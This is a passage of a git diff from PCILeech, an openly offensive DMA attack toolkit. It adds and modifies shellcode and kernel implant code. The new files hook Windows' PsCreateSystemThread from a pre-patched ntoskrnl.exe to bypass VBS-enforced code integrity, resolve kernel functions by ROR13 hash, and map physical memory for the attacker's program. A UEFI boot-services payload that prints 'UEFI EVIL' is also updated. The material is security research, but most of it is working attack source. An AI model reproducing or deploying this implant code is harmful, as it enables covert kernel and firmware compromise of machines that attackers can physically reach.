 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
-	FNOSX fn;						// [0x300] used by shellcode to store function pointers.
+	FNMACOS fn;						// [0x300] used by shellcode to store function pointers.
 	CHAR dataInStr[MAX_PATH];		// [0x400] string in-data
 	CHAR ReservedFutureUse2[252];
 	CHAR dataOutStr[MAX_PATH];		// [0x600] string out-data
@@ -239,7 +239,7 @@ VOID stage3_c_EntryPoint(PKMDDATA pk)
 	}
 	*(PQWORD)(qwPT_VA + 0x0000) = 0x0000000000000023 | (qwPT_PA + 0x1000); // PDPT -> PD
 	*(PQWORD)(VM_MIN_KERNEL_ADDRESS + (qwCR3 & 0x00000000fffff000) + 0xEE8) = 0x0000000000000023 | qwPT_PA; // PML4 -> PDPT
-	pk->ReservedKMD = qwPT_VA;
+	pk->ReservedKMD[0] = qwPT_VA;
 	// 3: main command loop.
 	while(TRUE) {
 		pk->_status = 1;
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj b/pcileech_shellcode/pcileech_shellcode.vcxproj
index 6540119..c28983c 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj
@@ -66,6 +66,8 @@
     <ClCompile Include="uefi_common.c" />
     <ClCompile Include="uefi_kmd_c.c" />
     <ClCompile Include="uefi_textout.c" />
+    <ClCompile Include="uefi_winload_ntos_kmd_c.c" />
+    <ClCompile Include="uefi_winload_ntos_patch.c" />
     <ClCompile Include="wx64_common.c" />
     <ClCompile Include="wx64_driverinfo.c" />
     <ClCompile Include="wx64_driverload_svc.c" />
@@ -95,6 +97,7 @@
     <None Include="macos_stage3.asm" />
     <None Include="uefi_common_a.asm" />
     <None Include="uefi_kmd.asm" />
+    <None Include="uefi_winload_ntos_kmd.asm" />
     <None Include="wx64_common_a.asm" />
     <None Include="wx64_exec_user.asm" />
     <None Include="wx64_pageinfo.asm" />
diff --git a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
index f7dc13c..ea36919 100644
--- a/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
+++ b/pcileech_shellcode/pcileech_shellcode.vcxproj.filters
@@ -135,6 +135,12 @@
     <ClCompile Include="uefi_textout.c">
       <Filter>Source Files\test</Filter>
     </ClCompile>
+    <ClCompile Include="uefi_winload_ntos_kmd_c.c">
+      <Filter>Source Files\exec</Filter>
+    </ClCompile>
+    <ClCompile Include="uefi_winload_ntos_patch.c">
+      <Filter>Source Files\exec</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <None Include="lx64_common_a.asm">
@@ -203,6 +209,9 @@
     <None Include="uefi_kmd.asm">
       <Filter>Source Files\kmd_core</Filter>
     </None>
+    <None Include="uefi_winload_ntos_kmd.asm">
+      <Filter>Source Files\exec</Filter>
+    </None>
   </ItemGroup>
   <ItemGroup>
     <ClInclude Include="lx64_common.h">
diff --git a/pcileech_shellcode/uefi_common.h b/pcileech_shellcode/uefi_common.h
index b2950b7..19fc6d2 100644
--- a/pcileech_shellcode/uefi_common.h
+++ b/pcileech_shellcode/uefi_common.h
@@ -14,11 +14,12 @@
 typedef void					VOID, *PVOID;
 typedef int						BOOL, *PBOOL;
 typedef unsigned char			BYTE, *PBYTE;
-typedef char					CHAR, *PCHAR;
+typedef char					CHAR, *PCHAR, *LPSTR;
 typedef unsigned short			WCHAR, *PWCHAR;
 typedef unsigned short			WORD, *PWORD;
-typedef unsigned long			DWORD, *PDWORD;
-typedef unsigned __int64		QWORD, *PQWORD;
+typedef unsigned long			DWORD, *PDWORD, LONG;
+typedef __int64					LONGLONG;
+typedef unsigned __int64		QWORD, *PQWORD, ULONGLONG;
 typedef void					*HANDLE;
 typedef unsigned long			STATUS;
 #define NULL					((void *)0)
@@ -27,35 +28,37 @@ typedef unsigned long			STATUS;
 #define FALSE					0
 #define UNREFERENCED_PARAMETER(P) (P)
 #define LOOKUP_FUNCTION(pk, szFn) (SysVCall(pk->AddrKallsymsLookupName, szFn))
+#define min(a, b)				((a < b) ? a : b)
+#define max(a, b)				((a > b) ? a : b)
 
 /*
-* KMD DATA struct. This struct must be contained in a 4096 byte section (page)
-* at the most. This data struct is used to communicate between the inserted
-* kernel code and the DMA reader/writer.
-* VNR: 002
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/OSX).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
-	QWORD _status;					// [0x030]
-	QWORD _result;					// [0x038]
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _status;					// [0x030] status of operation
+	QWORD _result;					// [0x038] result of operation TRUE|FALSE
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	PVOID fn[32];					// [0x300] used by shellcode to store function pointers.
@@ -100,8 +103,8 @@ extern VOID SetMem(
 	QWORD Value);
 
 extern VOID CopyMem(
-	QWORD *Destination,
-	QWORD *Source,
+	VOID *Destination,
+	VOID *Source,
 	QWORD Length);
 
 extern QWORD LocateProtocol(
@@ -158,16 +161,134 @@ typedef struct {
 } SIMPLE_TEXT_OUTPUT_MODE;
 
 typedef struct _EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL {
-	QWORD Reset;
+	QWORD(*Reset)(QWORD *This, QWORD *ExtendedVerification);
 	QWORD(*OutputString)(QWORD *This, WCHAR *String);
-	QWORD TestString;
-	QWORD QueryMode;
-	QWORD SetMode;
+	QWORD(*TestString)(QWORD *This, WCHAR *String);
+	QWORD(*QueryMode)(QWORD *This, QWORD ModeNumber, QWORD *Columns, QWORD *Rows);
+	QWORD(*SetMode)(QWORD *This, QWORD ModeNumber);
 	QWORD(*SetAttribute)(QWORD *This, QWORD Attribute);
 	QWORD(*ClearScreen)(QWORD *This);
-	QWORD SetCursorPosition;
-	QWORD EnableCursor;
+	QWORD(*SetCursorPosition)(QWORD *This, QWORD Column, QWORD Row);
+	QWORD(*EnableCursor)(QWORD *This, QWORD Visible);
 	SIMPLE_TEXT_OUTPUT_MODE *Mode;
 } EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL;
 
+//-------------------------------------------------------------------------------
+// PE / Windows defines below:
+//-------------------------------------------------------------------------------
+
+#define IMAGE_DIRECTORY_ENTRY_EXPORT        0			// Export Directory
+#define IMAGE_DOS_SIGNATURE                 0x5A4D      // MZ
+#define IMAGE_NT_SIGNATURE                  0x00004550  // PE00
+#define IMAGE_NUMBEROF_DIRECTORY_ENTRIES    16
+#define PIMAGE_NT_HEADERS					PIMAGE_NT_HEADERS64
+
+typedef struct _IMAGE_DOS_HEADER {
+	WORD   e_magic;
+	WORD   e_cblp;
+	WORD   e_cp;
+	WORD   e_crlc;
+	WORD   e_cparhdr;
+	WORD   e_minalloc;
+	WORD   e_maxalloc;
+	WORD   e_ss;
+	WORD   e_sp;
+	WORD   e_csum;
+	WORD   e_ip;
+	WORD   e_cs;
+	WORD   e_lfarlc;
+	WORD   e_ovno;
+	WORD   e_res[4];
+	WORD   e_oemid;
+	WORD   e_oeminfo;
+	WORD   e_res2[10];
+	LONG   e_lfanew;
+} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;
+
+typedef struct _IMAGE_EXPORT_DIRECTORY {
+	DWORD   Characteristics;
+	DWORD   TimeDateStamp;
+	WORD    MajorVersion;
+	WORD    MinorVersion;
+	DWORD   Name;
+	DWORD   Base;
+	DWORD   NumberOfFunctions;
+	DWORD   NumberOfNames;
+	DWORD   AddressOfFunctions;
+	DWORD   AddressOfNames;
+	DWORD   AddressOfNameOrdinals;
+} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
+
+typedef struct _IMAGE_FILE_HEADER {
+	WORD    Machine;
+	WORD    NumberOfSections;
+	DWORD   TimeDateStamp;
+	DWORD   PointerToSymbolTable;
+	DWORD   NumberOfSymbols;
+	WORD    SizeOfOptionalHeader;
+	WORD    Characteristics;
+} IMAGE_FILE_HEADER, *PIMAGE_FILE_HEADER;
+
+typedef struct _IMAGE_DATA_DIRECTORY {
+	DWORD   VirtualAddress;
+	DWORD   Size;
+} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;
+
+typedef struct _IMAGE_OPTIONAL_HEADER64 {
+	WORD        Magic;
+	BYTE        MajorLinkerVersion;
+	BYTE        MinorLinkerVersion;
+	DWORD       SizeOfCode;
+	DWORD       SizeOfInitializedData;
+	DWORD       SizeOfUninitializedData;
+	DWORD       AddressOfEntryPoint;
+	DWORD       BaseOfCode;
+	ULONGLONG   ImageBase;
+	DWORD       SectionAlignment;
+	DWORD       FileAlignment;
+	WORD        MajorOperatingSystemVersion;
+	WORD        MinorOperatingSystemVersion;
+	WORD        MajorImageVersion;
+	WORD        MinorImageVersion;
+	WORD        MajorSubsystemVersion;
+	WORD        MinorSubsystemVersion;
+	DWORD       Win32VersionValue;
+	DWORD       SizeOfImage;
+	DWORD       SizeOfHeaders;
+	DWORD       CheckSum;
+	WORD        Subsystem;
+	WORD        DllCharacteristics;
+	ULONGLONG   SizeOfStackReserve;
+	ULONGLONG   SizeOfStackCommit;
+	ULONGLONG   SizeOfHeapReserve;
+	ULONGLONG   SizeOfHeapCommit;
+	DWORD       LoaderFlags;
+	DWORD       NumberOfRvaAndSizes;
+	IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
+} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;
+
+typedef struct _IMAGE_NT_HEADERS64 {
+	DWORD Signature;
+	IMAGE_FILE_HEADER FileHeader;
+	IMAGE_OPTIONAL_HEADER64 OptionalHeader;
+} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;
+
+#define IMAGE_SIZEOF_SHORT_NAME              8
+
+typedef struct _IMAGE_SECTION_HEADER {
+	BYTE    Name[IMAGE_SIZEOF_SHORT_NAME];
+	union {
+		DWORD   PhysicalAddress;
+		DWORD   VirtualSize;
+	} Misc;
+	DWORD   VirtualAddress;
+	DWORD   SizeOfRawData;
+	DWORD   PointerToRawData;
+	DWORD   PointerToRelocations;
+	DWORD   PointerToLinenumbers;
+	WORD    NumberOfRelocations;
+	WORD    NumberOfLinenumbers;
+	DWORD   Characteristics;
+} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;
+
 #endif /* __UEFI_COMMON_H__ */
diff --git a/pcileech_shellcode/uefi_kmd_c.c b/pcileech_shellcode/uefi_kmd_c.c
index 733698e..3b10405 100644
--- a/pcileech_shellcode/uefi_kmd_c.c
+++ b/pcileech_shellcode/uefi_kmd_c.c
@@ -101,30 +101,30 @@ typedef struct tdPHYSICAL_MEMORY_RANGE {
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
 * This page/struct is used to communicate between the inserted kernel code and
 * the pcileech program.
-* VNR: 002
+* VNR: 003
 */
 typedef struct tdKMDDATA {
 	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of KERNEL HEADER (WINDOWS/MACOS).
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
 	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
 	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
 	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
 	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
 	QWORD _status;					// [0x030] status of operation
 	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] virtual address to operate on.
+	QWORD _address;					// [0x040] address to operate on.
 	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
 	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD;				// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[20];	// [0x060] reserved for future use.
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
 	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
 	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
 	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
 	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
 	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra in-data.
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
 	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra in-data. 
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
 	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
 	QWORD dataOut[28];				// [0x220]
 	PVOID fn[32];					// [0x300] used by shellcode to store function pointers.
@@ -230,8 +230,8 @@ VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
 	SetMem((PQWORD)pk, 0x1000, 0);
 	pk->MAGIC = 0x0ff11337711333377;
 	pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_UEFI;
-	pk->ReservedKMD = paUEFI_IBI_SYST;	// Address of UEFI system table
-	// 1: allocate memory for buffer
+	pk->ReservedKMD[0] = paUEFI_IBI_SYST; // Address of UEFI system table
+	// 2: allocate memory for buffer
 	addr = 0xffffffff;
 	pk->DMASizeBuffer = 0x01000000;
 	status = AllocatePages(1, EfiBootServicesData, 0x1000, &addr);
@@ -246,9 +246,9 @@ VOID c_EntryPoint(PKMDDATA pk, QWORD paUEFI_IBI_SYST)
 	}
 	pk->DMAAddrPhysical = addr;
 	pk->DMAAddrVirtual = addr;
-	// 2: disable any watchdog timer (if exists)
+	// 3: disable any watchdog timer (if exists)
 	pk->dataOut[2] = SetWatchdogTimer(0, 0, 0, 0);
-	// 3: main command loop.
+	// 4: main command loop.
 	while(TRUE) {
 		pk->_status = 1;
 		if (KMD_CMD_COMPLETED == pk->_op) { // NOP
diff --git a/pcileech_shellcode/uefi_textout.c b/pcileech_shellcode/uefi_textout.c
index fa13370..801cf91 100644
--- a/pcileech_shellcode/uefi_textout.c
+++ b/pcileech_shellcode/uefi_textout.c
@@ -7,14 +7,14 @@
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_common.c
 // cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_textout.c
 // ml64.exe uefi_common_a.asm /Feuefi_textout.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_textout.obj uefi_common.obj
-// shellcode64.exe -o uefi_textout.exe "UEFI TEST PROGRAM - PRINT STUFF ON THE SCREEN\n===========================================================\nSyntax: pcileech.exe -s <text_to_print>\nGENERAL INFORMATION BELOW:\n  TEXT      : %s\n"
+// shellcode64.exe -o uefi_textout.exe "UEFI TEST PROGRAM - PRINT STUFF ON THE SCREEN\n===========================================================\nSyntax: pcileech.exe uefi_textout\nOptions (optional): \ntext: -s <text to print>\nposition: -0 1 -1 <x_pos> -2 <y_pos>\nnumber of runs (default=1): -3 <number>\nGENERAL INFORMATION BELOW:\n  TEXT      : %s\n"
 //
 #include "uefi_common.h"
 
 VOID c_EntryPoint(PKMDDATA pk)
 {
 	WCHAR szPrint[MAX_PATH];
-	CHAR *szSrc, szPrintDefault[] = { ' ', ' ', ' ', 'U', 'E', 'F', 'I', ' ', 'E', 'V', 'I', 'L', ' ', 'I', 'N', ' ', 'B', 'O', 'O', 'T', ' ', 'S', 'E', 'R', 'V', 'I', 'C', 'E', 'S', '!', ' ', ' ', ' ', 0 };
+	CHAR *szSrc, szPrintDefault[] = { ' ', ' ', ' ', ' ', 'U', 'E', 'F', 'I', ' ', 'E', 'V', 'I', 'L', ' ', 'F', 'R', 'O', 'M', ' ', 'P', 'C', 'I', 'L', 'E', 'E', 'C', 'H', '!', ' ', ' ', ' ' , ' ', 0 };
 	EFI_GUID GUID_EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL = EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL_GUID;
 	EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL oOut;
 	EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL *pOut = &oOut;
@@ -27,7 +27,12 @@ VOID c_EntryPoint(PKMDDATA pk)
 	}
 	pk->dataOut[0] = efi_status = LocateProtocol(&GUID_EFI_SIMPLE_TEXT_OUTPUT_PROTOCOL, NULL, (QWORD**)&pOut);
 	if(!efi_status) {
+		if(pk->dataIn[0]) {
+			pOut->SetCursorPosition((QWORD*)pOut, pk->dataIn[1], pk->dataIn[2]);
+		}
 		pOut->SetAttribute((QWORD*)pOut, EFI_BACKGROUND_RED | EFI_CYAN);
-		pOut->OutputString((QWORD*)pOut, szPrint);
+		for(i = 0; i < max(1, pk->dataIn[3]); i++) {
+			pOut->OutputString((QWORD*)pOut, szPrint);
+		}
 	}
 }
diff --git a/pcileech_shellcode/uefi_winload_ntos_kmd.asm b/pcileech_shellcode/uefi_winload_ntos_kmd.asm
new file mode 100644
index 0000000..0075efe
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_kmd.asm
@@ -0,0 +1,88 @@
+; uefi_winload_ntos_kmd.asm : assembly to receive execution from hooked function PsCreateSystemThread at end of execution (instead of RET)
+;
+; (c) Ulf Frisk, 2017
+; Author: Ulf Frisk, pcileech@frizk.net
+;
+
+EXTRN c_EntryPoint:NEAR
+
+.CODE
+
+main PROC
+	JMP main_setup
+main ENDP
+
+data_trigger_count	db 00h, 00h		; offset 0x02
+addr_base_ntos		dd 00000000h	; offset 0x04
+addr_this			dd 00000000h    ; offset 0x08
+addr_sym0			dd 00000000h    ; offset 0x0c
+addr_sym1			dd 00000000h    ; offset 0x10
+addr_sym2			dd 00000000h    ; offset 0x14
+
+main_setup PROC
+	PUSH rax
+	; ----------------------------------------------------
+	; only continue of running at IRQL PASSIVE_LEVEL
+	; ----------------------------------------------------
+	MOV rax, cr8
+	TEST al, al
+	JNZ main_setup_exit
+	; ----------------------------------------------------
+	; save registers (14regs)
+	; ----------------------------------------------------
+	PUSH rbx
+	PUSH rcx
+	PUSH rdx
+	PUSH rdi
+	PUSH rsi
+	PUSH r8
+	PUSH r9
+	PUSH r10
+	PUSH r11
+	PUSH r12
+	PUSH r13
+	PUSH r14
+	PUSH r15
+	PUSH rbp
+	; ----------------------------------------------------
+	; fetch ntos base, vfs addr, cr3, align stack, jump to c-code
+	; ----------------------------------------------------
+	LEA rcx, [main]
+	MOV eax, [addr_this]
+	SUB rcx, rax
+	MOV eax, [addr_base_ntos]
+	ADD rcx, rax
+	LEA rdx, [main]
+	MOV r8, cr3
+	MOV r15, rsp
+	SUB rsp, 100h
+	SHR rsp, 4
+	SHL rsp, 4
+	CALL c_EntryPoint
+	MOV rsp, r15
+	; ----------------------------------------------------
+	; restore registers
+	; ----------------------------------------------------
+	POP rbp
+	POP r15
+	POP r14
+	POP r13
+	POP r12
+	POP r11
+	POP r10
+	POP r9
+	POP r8
+	POP rsi
+	POP rdi
+	POP rdx
+	POP rcx
+	POP rbx
+	; ----------------------------------------------------
+	; return
+	; ----------------------------------------------------
+	main_setup_exit:
+	POP rax
+	RET
+main_setup ENDP
+
+END
diff --git a/pcileech_shellcode/uefi_winload_ntos_kmd_c.c b/pcileech_shellcode/uefi_winload_ntos_kmd_c.c
new file mode 100644
index 0000000..abbcd65
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_kmd_c.c
@@ -0,0 +1,431 @@
+// uefi_winload_ntos_kmd_c.c : special kmd for use in pre-patched ntoskrnl.exe with VBS enforced code integrity
+//
+// (planned to be used in demo at 34c3)
+//
+// (c) Ulf Frisk, 2017
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+// compile with:
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_kmd_c.c
+// ml64.exe uefi_winload_ntos_kmd.asm /Feuefi_winload_ntos_kmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_kmd_c.obj
+// shellcode64.exe -o uefi_winload_ntos_kmd.exe
+//
+#include <windows.h>
+#pragma warning( disable : 4047 4055 4127)
+
+typedef unsigned __int64		QWORD, *PQWORD;
+typedef __int64					PHYSICAL_ADDRESS, *PPHYSICAL_ADDRESS;
+
+// ----------------------------- KERNEL DEFINES AND TYPEDEFS BELOW -----------------------------
+
+typedef struct _CLIENT_ID {
+	HANDLE UniqueProcess;
+	HANDLE UniqueThread;
+} CLIENT_ID;
+typedef CLIENT_ID *PCLIENT_ID;
+
+typedef _IRQL_requires_same_ _Function_class_(KSTART_ROUTINE) VOID KSTART_ROUTINE(
+	_In_ PVOID StartContext
+);
+typedef KSTART_ROUTINE *PKSTART_ROUTINE;
+
+typedef struct _UNICODE_STRING {
+	USHORT Length;
+	USHORT MaximumLength;
+	_Field_size_bytes_part_(MaximumLength, Length) PWCH   Buffer;
+} UNICODE_STRING;
+typedef UNICODE_STRING *PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES {
+	ULONG Length;
+	HANDLE RootDirectory;
+	PUNICODE_STRING ObjectName;
+	ULONG Attributes;
+	PVOID SecurityDescriptor;
+	PVOID SecurityQualityOfService;
+} OBJECT_ATTRIBUTES;
+typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;
+typedef CONST OBJECT_ATTRIBUTES *PCOBJECT_ATTRIBUTES;
+
+typedef enum _MEMORY_CACHING_TYPE {
+	MmNonCached = 0,
+	MmCached = 1,
+	MmWriteCombined = 2,
+	MmHardwareCoherentCached = 3,
+	MmNonCachedUnordered = 4,
+	MmUSWCCached = 5,
+	MmMaximumCacheType = 6
+} MEMORY_CACHING_TYPE;
+
+typedef struct _PHYSICAL_MEMORY_RANGE {
+	PHYSICAL_ADDRESS BaseAddress;
+	LARGE_INTEGER NumberOfBytes;
+} PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
+
+typedef enum _MODE {
+	KernelMode,
+	UserMode,
+	MaximumMode
+} MODE;
+
+// ----------------------------- ROR13 HASHES BELOW -----------------------------
+
+#define H_ExFreePool							0x9d489d1f
+#define H_MmAllocateContiguousMemory			0x9f361ebc
+#define H_MmFreeContiguousMemory				0x1345f592
+#define H_MmGetPhysicalAddress					0x5a326357
+#define H_MmGetPhysicalMemoryRanges				0x4977a56f
+#define H_MmMapIoSpace							0x05ddbef9
+#define H_MmUnmapIoSpace						0x6c6ec5c9
+#define H_PsCreateSystemThread					0x94a06b02
+#define H_RtlCopyMemory							0xcf64979b
+#define H_RtlZeroMemory							0xc53d4fdb
+#define H_ZwProtectVirtualMemory				0xbc3f4d89
+#define H_KeDelayExecutionThread				0x58586d92
+#define H_RtlZeroMemory							0xc53d4fdb
+
+// ----------------------------- SHELLCODE DEFINES AND TYPEDEFS BELOW (STAGE2) -----------------------------
+
+#undef RtlCopyMemory
+#undef RtlZeroMemory
+typedef struct tdNTOS {
+	VOID(*ExFreePool)(
+		_In_ PVOID P
+		);
+	VOID(*MmFreeContiguousMemory)(
+		_In_ PVOID BaseAddress
+		);
+	PVOID(*MmAllocateContiguousMemory)(
+		_In_ SIZE_T NumberOfBytes,
+		_In_ PHYSICAL_ADDRESS HighestAcceptableAddress
+		);
+	PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(
+		_In_ PVOID BaseAddress
+		);
+	PPHYSICAL_MEMORY_RANGE(*MmGetPhysicalMemoryRanges)(
+		VOID
+		);
+	PVOID(*MmMapIoSpace)(
+		_In_  PHYSICAL_ADDRESS    PhysicalAddress,
+		_In_  SIZE_T              NumberOfBytes,
+		_In_  MEMORY_CACHING_TYPE CacheType
+		);
+	VOID(*MmUnmapIoSpace)(
+		_In_  PVOID  BaseAddress,
+		_In_  SIZE_T NumberOfBytes
+		);
+	NTSTATUS(*PsCreateSystemThread)(
+		_Out_      PHANDLE            ThreadHandle,
+		_In_       ULONG              DesiredAccess,
+		_In_opt_   POBJECT_ATTRIBUTES ObjectAttributes,
+		_In_opt_   HANDLE             ProcessHandle,
+		_Out_opt_  PCLIENT_ID         ClientId,
+		_In_       PKSTART_ROUTINE    StartRoutine,
+		_In_opt_   PVOID              StartContext
+		);
+	VOID(*RtlCopyMemory)(
+		_Out_       VOID UNALIGNED *Destination,
+		_In_  const VOID UNALIGNED *Source,
+		_In_        SIZE_T         Length
+		);
+	NTSTATUS(*ZwProtectVirtualMemory)(
+		_In_ HANDLE ProcessHandle,
+		_Inout_ PVOID *BaseAddress,
+		_Inout_ PSIZE_T RegionSize,
+		_In_ ULONG NewProtect,
+		_Out_ PULONG OldProtect
+		);
+	NTSTATUS(*KeDelayExecutionThread)(
+		_In_ MODE            WaitMode,
+		_In_ BOOLEAN         Alertable,
+		_In_ PINT64          pllInterval_Neg100ns
+		);
+	QWORD ReservedFutureUse[21];
+} NTOS, *PNTOS;
+
+#define KMDDATA_OPERATING_SYSTEM_WINDOWS		0x01
+#define KMDDATA_MAGIC							0xff11337711333377
+
+/*
+* KMD DATA struct. This struct must be contained in a 4096 byte section (page).
+* This page/struct is used to communicate between the inserted kernel code and
+* the pcileech program.
+* VNR: 003
+*/
+typedef struct tdKMDDATA {
+	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
+	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
+	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
+	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
+	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
+	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
+	QWORD _status;					// [0x030] status of operation
+	QWORD _result;					// [0x038] result of operation TRUE|FALSE
+	QWORD _address;					// [0x040] address to operate on.
+	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
+	QWORD OperatingSystem;			// [0x050] operating system type
+	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
+	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
+	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
+	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
+	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
+	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
+	QWORD dataIn[28];				// [0x120]
+	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
+	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
+	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
+	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
+	QWORD dataOut[28];				// [0x220]
+	NTOS fn;						// [0x300] used by shellcode to store function pointers.
+	CHAR dataInStr[MAX_PATH];		// [0x400] string in-data
+	CHAR ReservedFutureUse2[252];
+	CHAR dataOutStr[MAX_PATH];		// [0x600] string out-data
+	CHAR ReservedFutureUse3[252];
+	QWORD ReservedFutureUse4[255];	// [0x800]
+	QWORD _op;						// [0xFF8] (op is last 8 bytes in 4k-page)
+} KMDDATA, *PKMDDATA;
+
